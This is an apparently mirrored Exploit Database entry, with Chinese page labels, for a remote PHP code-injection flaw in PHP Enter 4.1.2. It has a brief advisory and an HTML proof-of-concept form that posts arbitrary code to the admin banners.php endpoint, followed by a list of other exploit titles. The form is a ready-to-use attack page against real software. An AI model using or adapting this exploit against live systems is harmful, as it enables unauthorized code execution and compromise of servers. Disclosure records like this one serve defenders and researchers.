PHP Enter 4.1.2 – ‘banners.php’ PHP Code Injection

Exploit Database
13 阅读

作者： L3b-r1'z

日期： 2012-05-08
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/37140/

source: https://www.securityfocus.com/bid/53426/info

PHP Enter is prone to a remote PHP code-injection vulnerability.

An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

PHP Enter 4.1.2 is vulnerable; other versions may also be affected. 

<form method="post" action="http://www.example.com/admin/banners.php">
<center>
<font color=#3A586A>Code</font><br />
<textarea name="code">&lt;/textarea&gt;
<br /><br />
<input type="submit" name="submit" VALUE=" Submit"><br /><br /><br /><br/>
</form>

last Exploits
PHP Enter 4.1.2 – ‘banners.php’ PHP Code Injection的更多信息

Joomla! Component Ek Rishta 2.10 – SQL Injection：
Interscan Web Security 5.0 – Arbitrary File Upload / Privilege Escalation：
TCExam 11.2.011 – Multiple SQL Injections：
Facturation System 1.0 – ‘modid’ SQL Injection：
MLM Forex Market Plan Script 2.0.1 – SQL Injection：
Lost and Found Information System v1.0 – ( IDOR ) leads to Account Take over：
Codiad 2.8.4 – Remote Code Execution (Authenticated)：
FileBox File Hosting & Sharing Script 1.5 – SQL Injection：